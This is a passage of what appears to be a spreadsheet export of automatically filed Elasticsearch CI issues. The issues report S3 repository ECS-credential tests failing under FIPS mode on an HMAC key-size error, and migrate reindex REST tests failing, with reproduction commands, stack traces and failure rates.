    <t>[CI] RepositoryS3EcsClientYamlTestSuiteIT test {yaml=repository_s3/50_repository_ecs_credentials/Register a read-only repository with a non existing client} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5099 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/juhevdup6jnps) - [elasticsearch-periodic #5093 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ucdlktixd3umq) - [elasticsearch-periodic #5081 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/nuze54fidqdos) - [elasticsearch-periodic #5069 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/haqajpi3qx7mk) - [elasticsearch-periodic #5045 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ewn4sf6asb3ou) **Reproduction Line:**  ./gradlew ":modules:repository-s3:yamlRestTest" --tests "org.elasticsearch.repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT.test {yaml=repository_s3/50_repository_ecs_credentials/Delete a non existing snapshot}" -Dtests.seed=100082FF2DF14682 -Dtests.locale=de-AT -Dtests.timezone=America/Kentucky/Louisville -Druntime.java=17 -Dtests.fips.enabled=true  **Applicable branches:** 8.x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repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Drepository_s3%2F50_repository_ecs_credentials%2FRegister%20a%20read-only%20repository%20with%20a%20non%20existing%20client%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [repository_s3/50_repository_ecs_credentials:7]: expected [2xx] status code but api [snapshot.create_repository] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"}],"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","caused_by":{"type":"i_o_exception","reason":"Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"illegal_key_exception","reason":"Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","stack_trace":"org.bouncycastle.crypto.IllegalKeyException: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com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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java.base/java.lang.Thread.run(Thread.java:833)\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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 38 more\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"stack_trace":"java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"status":500}]  **Issue Reasons:** - [8.x] 2 consecutive failures in step openjdk17_checkpart1_java-fips-matrix - [8.x] 5 failures in test test {yaml=repository_s3/50_repository_ecs_credentials/Register a read-only repository with a non existing client} (1.3% fail rate in 373 executions) - [8.x] 5 failures in step openjdk17_checkpart1_java-fips-matrix (71.4% fail rate in 7 executions) - [8.x] 5 failures in pipeline elasticsearch-periodic (50.0% fail rate in 10 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/117711</t>
  </si>
  <si>
    <t>[CI] RepositoryS3EcsClientYamlTestSuiteIT test {yaml=repository_s3/50_repository_ecs_credentials/Restore a non existing snapshot} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5099 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/juhevdup6jnps) - [elasticsearch-periodic #5093 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ucdlktixd3umq) - [elasticsearch-periodic #5081 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/nuze54fidqdos) - [elasticsearch-periodic #5069 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/haqajpi3qx7mk) - [elasticsearch-periodic #5045 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ewn4sf6asb3ou) **Reproduction Line:**  ./gradlew ":modules:repository-s3:yamlRestTest" --tests "org.elasticsearch.repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT.test {yaml=repository_s3/50_repository_ecs_credentials/Delete a non existing snapshot}" -Dtests.seed=100082FF2DF14682 -Dtests.locale=de-AT -Dtests.timezone=America/Kentucky/Louisville -Druntime.java=17 -Dtests.fips.enabled=true  **Applicable branches:** 8.x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repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Drepository_s3%2F50_repository_ecs_credentials%2FRestore%20a%20non%20existing%20snapshot%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [repository_s3/50_repository_ecs_credentials:7]: expected [2xx] status code but api [snapshot.create_repository] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"}],"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","caused_by":{"type":"i_o_exception","reason":"Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"illegal_key_exception","reason":"Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","stack_trace":"org.bouncycastle.crypto.IllegalKeyException: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com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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java.base/java.lang.Thread.run(Thread.java:833)\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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 38 more\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"stack_trace":"java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"status":500}]  **Issue Reasons:** - [8.x] 2 consecutive failures in step openjdk17_checkpart1_java-fips-matrix - [8.x] 5 failures in test test {yaml=repository_s3/50_repository_ecs_credentials/Restore a non existing snapshot} (1.3% fail rate in 373 executions) - [8.x] 5 failures in step openjdk17_checkpart1_java-fips-matrix (71.4% fail rate in 7 executions) - [8.x] 5 failures in pipeline elasticsearch-periodic (50.0% fail rate in 10 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/117712</t>
  </si>
  <si>
    <t>[CI] RepositoryS3EcsClientYamlTestSuiteIT test {yaml=repository_s3/50_repository_ecs_credentials/Register a read-only repository with a non existing bucket} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5099 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/juhevdup6jnps) - [elasticsearch-periodic #5093 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ucdlktixd3umq) - [elasticsearch-periodic #5087 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/trqcarswmml6o) - [elasticsearch-periodic #5081 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/nuze54fidqdos) - [elasticsearch-periodic #5069 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/haqajpi3qx7mk) - [elasticsearch-periodic #5045 / openjdk17_checkpart1_java-fips-matrix](https://gradle-enterprise.elastic.co/s/ewn4sf6asb3ou) **Reproduction Line:**  ./gradlew ":modules:repository-s3:yamlRestTest" --tests "org.elasticsearch.repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT.test {yaml=repository_s3/50_repository_ecs_credentials/Delete a non existing snapshot}" -Dtests.seed=100082FF2DF14682 -Dtests.locale=de-AT -Dtests.timezone=America/Kentucky/Louisville -Druntime.java=17 -Dtests.fips.enabled=true  **Applicable branches:** 8.x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repositories.s3.RepositoryS3EcsClientYamlTestSuiteIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Byaml%3Drepository_s3%2F50_repository_ecs_credentials%2FRegister%20a%20read-only%20repository%20with%20a%20non%20existing%20bucket%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [repository_s3/50_repository_ecs_credentials:7]: expected [2xx] status code but api [snapshot.create_repository] returned [500 Internal Server Error] [{"error":{"root_cause":[{"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"}],"type":"repository_verification_exception","reason":"[repository_ecs] path [ecs_base_path] is not accessible on master node","caused_by":{"type":"i_o_exception","reason":"Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"sdk_client_exception","reason":"Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","caused_by":{"type":"illegal_key_exception","reason":"Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC","stack_trace":"org.bouncycastle.crypto.IllegalKeyException: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com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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java.base/java.lang.Thread.run(Thread.java:833)\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\tat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 38 more\n"},"stack_trace":"com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"stack_trace":"java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat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com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat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 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused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 38 more\n"},"stack_trace":"org.elasticsearch.repositories.RepositoryVerificationException: [repository_ecs] path [ecs_base_path] is not accessible on master node\nCaused by: java.io.IOException: Unable to upload object [ecs_base_path/tests-cj1XVnNaSW2HOV2u3TBfdA/master.dat] using a single upload\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:466)\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$writeBlob$1(S3BlobContainer.java:144)\n\tat java.base/java.security.AccessController.doPrivileged(AccessController.java:569)\n\tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedIOException(SocketAccess.java:38)\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlob(S3BlobContainer.java:142)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.blobstore.BlobContainer.writeBlob(BlobContainer.java:124)\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.writeBlobAtomic(S3BlobContainer.java:304)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.blobstore.BlobStoreRepository.startVerification(BlobStoreRepository.java:2205)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.repositories.RepositoriesService.lambda$validatePutRepositoryRequest$11(RepositoriesService.java:373)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionRunnable$1.doRun(ActionRunnable.java:37)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1023)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)\n\tat java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)\n\tat java.base/java.lang.Thread.run(Thread.java:833)\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:109)\n\tat com.amazonaws.auth.AWS4Signer.newSigningKey(AWS4Signer.java:639)\n\tat com.amazonaws.auth.AWS4Signer.deriveSigningKey(AWS4Signer.java:404)\n\tat com.amazonaws.auth.AWS4Signer.sign(AWS4Signer.java:253)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeOneRequest(AmazonHttpClient.java:1320)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeHelper(AmazonHttpClient.java:1157)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.doExecute(AmazonHttpClient.java:814)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.executeWithTimer(AmazonHttpClient.java:781)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.execute(AmazonHttpClient.java:755)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutor.access$500(AmazonHttpClient.java:715)\n\tat com.amazonaws.http.AmazonHttpClient$RequestExecutionBuilderImpl.execute(AmazonHttpClient.java:697)\n\tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:561)\n\tat com.amazonaws.http.AmazonHttpClient.execute(AmazonHttpClient.java:541)\n\tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5456)\n\tat com.amazonaws.services.s3.AmazonS3Client.invoke(AmazonS3Client.java:5403)\n\tat com.amazonaws.services.s3.AmazonS3Client.access$300(AmazonS3Client.java:421)\n\tat com.amazonaws.services.s3.AmazonS3Client$PutObjectStrategy.invokeServiceCall(AmazonS3Client.java:6531)\n\tat com.amazonaws.services.s3.AmazonS3Client.uploadObject(AmazonS3Client.java:1861)\n\tat com.amazonaws.services.s3.AmazonS3Client.putObject(AmazonS3Client.java:1821)\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.lambda$executeSingleUpload$16(S3BlobContainer.java:464)\n\tat org.elasticsearch.repositories.s3.SocketAccess.lambda$doPrivilegedVoid$0(SocketAccess.java:47)\n\tat java.base/java.security.AccessController.doPrivileged(AccessController.java:318)\n\tat org.elasticsearch.repositories.s3.SocketAccess.doPrivilegedVoid(SocketAccess.java:46)\n\tat org.elasticsearch.repositories.s3.S3BlobContainer.executeSingleUpload(S3BlobContainer.java:464)\n\t 14 more\nCaused by: com.amazonaws.SdkClientException: Unable to calculate a request signature: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:132)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:105)\n\t 37 more\nCaused by: org.bouncycastle.crypto.IllegalKeyException: Key size for HMAC must be at least 112 bits in approved mode: SHA-256/HMAC\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsSHS$MACOperatorFactory.createMAC(Unknown Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.crypto.fips.FipsMACOperatorFactory.createOutputMACCalculator(Unknown Source)\n\tat org.bouncycastle.fips.core/org.bouncycastle.jcajce.provider.BaseHMac.engineInit(Unknown Source)\n\tat java.base/javax.crypto.Mac.init(Mac.java:432)\n\tat com.amazonaws.auth.AbstractAWSSigner.sign(AbstractAWSSigner.java:127)\n\t 38 more\n"},"status":500}]  **Issue Reasons:** - [8.x] 4 consecutive failures in step openjdk17_checkpart1_java-fips-matrix - [8.x] 6 failures in test test {yaml=repository_s3/50_repository_ecs_credentials/Register a read-only repository with a non existing bucket} (1.6% fail rate in 375 executions) - [8.x] 6 failures in step openjdk17_checkpart1_java-fips-matrix (85.7% fail rate in 7 executions) - [8.x] 6 failures in pipeline elasticsearch-periodic (60.0% fail rate in 10 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/118273</t>
  </si>
  <si>
    <t>[CI] XPackRestIT test {p0=migrate/10_reindex/Test Reindex With Unsupported Mode} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5321 / release-tests](https://gradle-enterprise.elastic.co/s/jyrnzsmwci3pk) - [elasticsearch-pull-request #45572 / release-tests](https://gradle-enterprise.elastic.co/s/j4i756bs3u4tm) - [elasticsearch-pull-request #45528 / release-tests](https://gradle-enterprise.elastic.co/s/7ytjhywudkcpe) - [elasticsearch-pull-request #45454 / release-tests](https://gradle-enterprise.elastic.co/s/opupzuedyh7xy) - [elasticsearch-periodic #5309 / release-tests](https://gradle-enterprise.elastic.co/s/7zdy2lvjsycr4) - [elasticsearch-periodic #5303 / release-tests](https://gradle-enterprise.elastic.co/s/hxdhhq46djmpa) - [elasticsearch-pull-request #45409 / release-tests](https://gradle-enterprise.elastic.co/s/wjlncfil6euwi) - [elasticsearch-periodic #5297 / release-tests](https://gradle-enterprise.elastic.co/s/3ljn5jyiywcno) - [elasticsearch-periodic #5291 / release-tests](https://gradle-enterprise.elastic.co/s/yabxk4tgrhxmq) **Reproduction Line:**  ./gradlew ":x-pack:plugin:yamlRestTest" --tests "org.elasticsearch.xpack.test.rest.XPackRestIT.test {p0=migrate/10_reindex/Test Reindex With Nonexistent Data Stream}" -Dtests.seed=FFE1DC7DB5CD5155 -Dbuild.snapshot=false -Dtests.jvm.argline="-Dbuild.snapshot=false" -Dlicense.key=x-pack/license-tools/src/test/resources/public.key -Dtests.locale=tt-RU -Dtests.timezone=Europe/Astrakhan -Druntime.java=23  **Applicable branches:** 8.x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xpack.test.rest.XPackRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Dmigrate%2F10_reindex%2FTest%20Reindex%20With%20Unsupported%20Mode%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [migrate/10_reindex:22]: the error message was expected to match the provided regex but didn't Expected: resource_not_found_exception but: was "no handler found for uri [/_migration/reindex?error_trace=true] and method [POST]"  **Issue Reasons:** - [8.x] 9 consecutive failures in step release-tests - [8.x] 9 failures in test test {p0=migrate/10_reindex/Test Reindex With Unsupported Mode} (3.5% fail rate in 258 executions) - [8.x] 9 failures in step release-tests (100.0% fail rate in 9 executions) - [8.x] 5 failures in pipeline elasticsearch-periodic (83.3% fail rate in 6 executions) - [8.x] 4 failures in pipeline elasticsearch-pull-request (8.7% fail rate in 46 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/118274</t>
  </si>
  <si>
    <t>[CI] XPackRestIT test {p0=migrate/10_reindex/Test Reindex With Nonexistent Data Stream} failing</t>
  </si>
  <si>
